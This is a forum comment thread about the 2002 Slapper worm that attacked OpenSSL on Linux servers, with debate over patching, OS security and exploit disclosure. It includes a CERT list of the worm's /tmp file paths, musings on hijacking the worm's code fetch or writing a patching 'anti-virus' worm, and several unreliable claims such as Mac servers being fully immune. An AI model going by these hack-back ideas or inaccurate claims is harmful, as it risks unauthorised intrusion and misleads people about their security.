The original had an 'execute local command' option, and some wise bugtraq reader (no, it wasn't me
Or failing that, one might write a wee proggie to sit on UDP port 2002, and reply to any connections with this command. One would, of course, run this on an isolated machine...
Wouldn't moving the /usr/bin/gcc command to a backup file stop these worms from spreading? Move it back only temporarily when you need to "make" something.
Meh.
Yes, I'm going to be joining in the crowds of the "Windows still sucks despite this". And here's my reason why:
Simply put, as one person commented, a default Linux installation usually defaults to almost all services being turned OFF, whereas many Windows installations default to vulnerable services being ON.
As a result, the percentage of Linux servers that are actually intended to be servers is FAR greater than the percentage of Windows machines with IIS running that someone is actively maintaining.
As a result, more systems get patched sooner.
For a little dose of reality about Slapper: A friend of mine installed a honeypot on his network, waiting for a Slapper hit so he could check out this new, oh-so-uber threat to our wonderful Linux.
After a few days (might've been as long as a week), Slapper finally hit his machine.
Guess what else hit his machine? Code Red, a year-old Windows worm that made headlines *well over a year ago*, a minimum of 12 CR hits per DAY.
Now, given the Netcraft statistics where Apache has 40-50% of the marketshare of web servers on the 'net - Shouldn't Slapper be hitting more often than Code Red?
But it isn't, because Linux installations are more secure out-of-the-box, and are NOT vulnerable out of the box. One of the main reasons so many Windows machines aren't having IIS patches applied is because the user doesn't even know that IIS is running!
retrorocket.o not found, launch anyway?
Tell me precisely what the difference is, in reality, between the so-called white hats that publish exploit code that allows script kiddies across the world to execute arbitrary code (w/o any modification) on remote machines and the so-called black hat that does the same thing only does not require the same number of script kiddies (because it is self-perpetuating)? Neither necessarily use or commence the attack themselves, but they enable thousands of machines to be hacked just the same. Maybe you can argue that proof of the concept does not require self-perpetuation or the installation of a backdoor (as in the case of the worm), but nor does it require the execution of code that is desirable to the script kiddy (as in the case of many so-called white hat advisories)
Is there something that will check a system for _vulnerability_ as opposed to just if it's infected?
I think the idea is that the slapper worm will try to grab something from server X (which it believes to be infected) and it tries to run that. If I replaced what it was expecting with something else, that can't be my fault - an external entity was grabbing code off my servers and executing it, not me.
Perhaps I misread this idea tho?
creation science book
Comment removed based on user account deletion
Comment removed based on user account deletion
Sysadmins just put an apt-get update in their list of cron jobs. I'm sure it'll save them time by not having to constantly check for security holes, etc online.
Not all Apache servers run on Linux. Not all Linux systems run Apache. Not all Linux/w Apache has mod_ssl.
Je ne parle pas francais.
... and you haven't already patched this months-old hole, hand in your resignation now. There's lots of folks more competent than you who need work.
It would be trivially easy to write a function to randomly assign buffersize based on parameters (say, min max and optimal size), and even change its size periodically at runtime. That would eliminate this entire class of attack.
Correct me if I'm wrong but these Slapper viruses only infect ix86 Linux distributions. Since it is a buffer overflow attack the code that overflows must be platform specific. In which case my PowerPC machines are safe from this round of viruses as the virus can only infect ix86 machines.
"Windows Admin with Thumb Up Butt" == "Linux Admin with Thumb Up Butt" == "No Admin At All"
Any word on IDS signatures for snort, etc. ?
It does very little good to check for a rootkit when all the good GNU stuff in /bin has been trojaned...
-B
Ash and Hickory, straight-grained and true, make excellent bludgeons, dandy for the cudgeling of vegetarians.
Thank you extremely for putting this up. Seems my server is safe (and now patched), but it's good to know so that I don't have to worry. Also, it saddens me greatly to see that some buttmunch posted the full link, where to be a jerk or just out of sheer ignorance I don't know.
g z (replace triple-w. with www.)
Here's a copy: triple-w.phormix.com/files/public/chkrootkit.tar.
"Worms" on the internet? will a "fish" take care of it? - phorm
It transparently replaces the libc functions that are the usual targets of stack smashing attacks, and checks whether the stack frame has been overrun. If the stack has been smashed, the process gets terminated forcefully, and root (or other designated contact) gets an e-mail with all the details.
This has been out for several years now, and I am amazed that no major distribution includes this in a standard server install.
-Steve
Hey, Windows users, there is no such thing as "forward" slash, there is only slash and backslash.
And if there were no compiler, then all my ./configure, make && make install scripts would go to hell, seeing as though they all recompile themselves. A lot of useful patches often recompile themselves too.
Renaming your compiler binary instead of deleting it would probably be more useful, that way one could at least compile wanted code when needed.
gcc evil-worm-patch. bash: gcc: command not found. ah crap - phorm
when i was admin, i patched the machines as often as i could
:)
cause it was fun.
do the same and you'll be safe
I'd tell you the chances of this story being a dupe, but you wouldn't like it.
I was infected a week ago. The next day I was warned by F-secure.
I removed the files. Commented out the open_ssl module and restarted Apache.
I had done an upgrade of openSSL in August or so I thought - problem: Redhat backported the patch to the same version number as installed with 7.2. I guess that I applied the wrong rpms.
As for gcc on the server - the server isn't in tha same country as I am. I have never seen it in the flesh. I have a standard Redhat 7.2 on the machine because I need to compile stuff from time to time.
realkiwi
Open SSL Security Advisory from July
When I first heard about this "virus", I must admit my sphincter clenched up a bit, being responsible for more than a few Open SSL ecommerce servers (and just having started a week off from work to boot). But after a looking into it for about 10 seconds, I realized I was ok since I upgraded in July.
Am I missing something here or are the people that did get affected by this people who simply ignored the July warning?
For those of you who don't recall, the Pinto was a car with a minor flaw - If you bumped into its ass it tended to explode in a fireball.
Ford new of the problem, and even had a "patch" to fix it (minor design change adding some shielding around the tank if I recall). They chose not to fix the problem because of economics.
The same principle applies to large companies and security patches - If there's no exploit and we don't tell anyone the problem exists, maybe we can get away without investing the time/money (programmers are expen$ive!) in fixing it. Much like Ford, they are gambling that the losses due to the bug/hole/whatever won't be significant enough to hurt their profits long-term.
Software is a business, like any other, and businesses tend to make stupid decisions when they see a way to save a few pennies. They may be wrong (VERY VERY WRONG), but until EVERYONE makes it clear that the "patch it when it gets exploited" mentality hurts their business, the companies will continue doing as they have done.
/~mikeg
I mean, according to the FSF FAQ, shouldn't this be called a GNU/Linux worm?
viruses aren't for windows anymore???
The figures being bandied about here are as follows: Code red infected 400000 systems. Slapper infected probably 15000 systems. Considering that Microsoft IIS and Apache/ssl have comparable market share, I'd say the actual, practical, measured difference in vulnerability levels between Microsoft and Apache administrators is substantial.
No matter how secure Linux claims to be, people should take the perception of default installs being invulnerable out of the box with a huge grain of salt, and give it a good look for anything they can turn off or plug up. The same goes for Windows users, ESPECIALLY for them in my opinion. :) If anything this whole Slapper issue should serve to educate both sides of the Windows vs. Linux debate that security problems exist for everyone no matter what you run.
"I'm a leaf on the wind. Watch how I soar."
-Hoban Washburn
This has been the biggest news in the security
community for weeks. You guys are clueless.
And you keep ignoring an equally serious exploit
involving trojanned configure scripts. Apparently
because you reported on it in July you are willing
to let your readers suffer ownership to avoid
getting a bunch of lamer posts saying "you already
reported this."
PATHETIC, Pathetic, pathetic...
I don't know who's doing the counting, but my servers got slammed last week with probes from this damn worm. There are a hell of a lot more than 11,000 machines infected. The traffic I'm seeing from this worm is significantly higher than I saw from Code Red.
$ cd OpenSSL
$ (for obj in $(find . -name *.c); do grep strcpy $obj; done) | wc
37 72 1197
$ (for obj in $(find . -name *.c); do grep strcat $obj; done) | wc
47 57 1125
$ (for obj in $(find . -name *.c); do grep goto $obj; done) | wc
2840 10161 71668
$
Most of the "goto"s are something like "goto end" or "goto bad". However, things like "goto start" look as if they could have been done using for(;;) { } or do { } while(..) or something similar instead.
I wonder why everyone uses null-terminated character arrays and dangerous things like strcat() or strcpy(). Maybe one should rather use a collection of 'trusted' functions that keep track of the current lenght and the maximum lenght of a character array; just for the case one would like to call a product "secure".
Practically Impossible Not To Oxplode
And, it's not an Apache worm either. It's an OpenSSL worm that exploits security holes in OpenSSL 0.9.6f and earlier.
1 82002.ht m
While the current generation of Slapper targets only OpenSSL on Linux, it will try its attack on any system. And, with a little code tweaking, the next generation of Slapper could hammer on any OS that uses older versions of OpenSSL such as AIX, Solaris, Windows. In short, pretty much any OS that uses OpenSSL is potentially a victim.
Could you have it? If you're a Unix/Linux admin, use chkroot version 0.37 and up to find out. It's available at:
http://www.chkrootkit.org/
In any case, anyone who uses OpenSSL should update with OpenSSL 0.9.6g or higher ASAP. And, while you're at, be certain to relink everything since OpenSSL isn't used just by Apache. ISC, for example, used it in their BIND 9.1. Slapper wouldn't hit BIND, but would you care to bet that someone couldn't modify the code to launch a BIND attack--and aren't we all really, really sick of BIND getting bungled?
For more on Slapper, and a listing of patches for many operating systems see:
Slapper: The FUD and the Danger
http://www.practical-tech.com/network/n09
Finally, most of these patches, which would have stopped Slapper dead, were available in late July/early August. Consider it more proof that security is a full time system administrator job.
Steven
Worst episode ever!
Comic-Book Guy was here...
Believe it or not, a goatsex link was modded Insightful. I shit you not.
here ya go ...
While you're right in part about the importance to secure a system, you miss out completely on the importance on defense in depth.
The worst flaw of them all about any security, not just information security, is depending on any one process or action or filter to take care of all attacks. It Won't Work. It Will Fail and when it does, you're hosed. The more defenses in depth you have deployed, the better off you are.
Let me illustrate some of the key design criteria for a modern-day tank (as in main battle tank) to illustrate:
1) Avoid detection.
2) If detected, avoid getting hit.
3) If hit, avoid penetration.
4) If penetrated, minimize damage to equipment and crew.
See what I mean? You have to consider what happens if your defenses fail, and where you would be the most vulnerable, and take additional steps there. Because, you know what? Your defenses will fail. But the more of them you have, the less damage an attacker will be able to do by bringing one down.
(One software company I used to work for would take this to extremes and code X-Files style; "Always assume that the entire world around you has been compromised, that your code is the last piece of code standing! Every data you get, even from within the system, is from somebody who's feeding you bogus or random data, or even lying on purpose to make you fail." But the resulting software had defense in depth.)
Anybody else have the idea that many vulnerabilities are partially due to deficiencies of the programming language used? For example, I believe that C's cumbersome string handling is a major cause of buffer-overrun vulnerabilities. Of course, buffer-overruns and off-by-one errors are programming errors, but I think their frequency at the very least lends legitimacy to programming languages designed to avoid such errors.
As for stack-smashing: I think stack shouldn't be executable anyway. Since Intel has given us data segments that aren't executable and code segments that aren't writable, at least x86 systems could be invulnerable to these attacks. Well, causing a segmentation fault would still lead to DoS I guess, but at least it wouldn't allow arbitrary code to be executed, which would also prevent worms from spreading. And if the segmentation fault would only terminate the thread that is being attacked, rahter than the whole server, it even DoS wouldn't be possible anymore - except through flooding, but that's a different story.
Summing up, I think there is reason to reconsider the lower-level components of our systems. Programming errors could to a large extend be avoided by using a language that doesn't allow them, and implementing a more rigid security system at memory manager level could stop certain exploits from working.
Please correct me if I got my facts wrong.
It started with kernel version after version fixing memory holes etc etc.
...
Then It continued with linux movement being teared apart with different version of linux
Now, there area enouggh investement in Linux so it is profitable for virus makers.
Unless the Linux community units and fight all attepmt to make money from linux , building better tools, and not allwing Icazas like attempt to profit...
THe future
a fully Linux bugged like windows..
The trend is very clear, viruses will grow, stop being such maniacs thinking linux is perfect, and start making it better in reality.
Stop the trend!!!!!!!!!!!
Look for the following (from CERT):
/tmp/.uubugtraq /tmp/.bugtraq.c /tmp/.bugtraq /tmp/.unlock.c /tmp/.update.c /tmp/.cinik /tmp/.cinik.c /tmp/.cinik.go /tmp/.cinik.goecho /tmp/.cinik.uu
Variant "A"
Variant "B"
Variant "C"
I have seen variant A and B on my network (I admin about 200 machines, but unfortunately the customers themselves, not I are in charge of patching their systems. I only go in and fix it when the customers realize something is wrong. Sort of a "meta-admin" if you will.)
I have not seen variant C, which I believe uses port 1978. Once the worm hit we blocked all the ports it uses at the router. This mitigated much of the damage, even though the exploit comes in on port 443.
HOWEVER be aware I have seen some attempted backdoor exploits that were not worm based. That is, an apache shell was obtained and someone was in on the system installing extra software and attempting to escalate privliages and crack the root account.
This is far more serious than the worm by itself. Fortunately, all I have seen so far is skript kiddies attempting to install backdoors that don't work because they do not have a rootshell. These backdoors were clearly not part of the regular worm. So other exploits than just the worm itself are out there.
Fortunately this worm is waking my customers up, and the systems are getting patched. (It does not matter how many times I run nessus, and send the customer a report saying "fix this", when I send them a message saying "you have now been hit" they suddenly spring into action, or get me to fix it. Funny how that works.)
Try to hack my 31337 firewall!
Hey all,
Ero Carrera at F-Secure.com asked that I post this for them:
"Information and live status about the worm can be found at http://www.f-secure.com/slapper/"
Inner Monologue I wonder if Ero is a guy or a chick? And if it's chick is she like looking, ya know what I mean?
You say things that offend me and I can deal with it. Can you?
This proves the Brits were behind slapper. And since the PATRIOT Act allows us to define propagating computer worms as an act of terrorism, I vote that the Bush Administration does what we should have done a long time ago:
INVADE BRITAIN!!!!
anti-virus as a cure?
... a virus that infects computers the same way the Slapper viruses do, but then patches the security breach instead of exploiting it further?
this may just be a naive question from a simple web programmer, but why can't someone just write an 'anti-virus?'
Lern tu speek and wryt englsh u bunghole. The word IS VIRII! Viruses sounds like something that an ignorant New York hooker would say. Like "oohh... I slapted my asseses!"
Half wits at symantec haven't figured out that Linux is a completely different market than the Microsoft open door policy to exploit market.
Why are making this Much more complicated than necessary? I would not even think of downloading a fix for my SuSE system from any outside source. Sign up for the SuSE security mailing list and you will be notified, then disable the service or take appropriate measures until the SuSE security team releases the patch. Download the patch from SuSE and apply it.
microsoft is writing the linux worms.
Simply put, as one person commented, a default Linux installation usually defaults to almost all services being turned OFF, whereas many Windows installations default to vulnerable services being ON.
Yeah, well, the service that this worm exploits is ON. Which makes your point absolutely moot.
I found this at google:
mefus
In Open Society, GPL Software frees YOU!
Slackware 8.1 has libsafe as one of the packages in /extra directory.
--- d'oh
no mac os9 or 0s8 server EVER exploited in entire BugTraq database history.
Based on 7 years or more of historical fact, macs are 100% immune running wbservers on the net. There are many technical reasons why macs are the most secure OS.
Is this a virus based upon a bug in an old version that has been patched and gotten quite a bit of publicity not to long ago?
Shoot Pixels, Not People!
Where have you folks been? This has been around and in the news for well over a week. Those of us who were vulnerable and cared about security have long since updated OpenSSL and moved on.
"We don't do a new version to fix bugs." - Bill Gates
"The new version - it's not there to fix bugs." - Bill Gates
-- Retranslated from Focus 43/1995, pp. 206-212
- this post brought to you by the Automated Last Post Generator...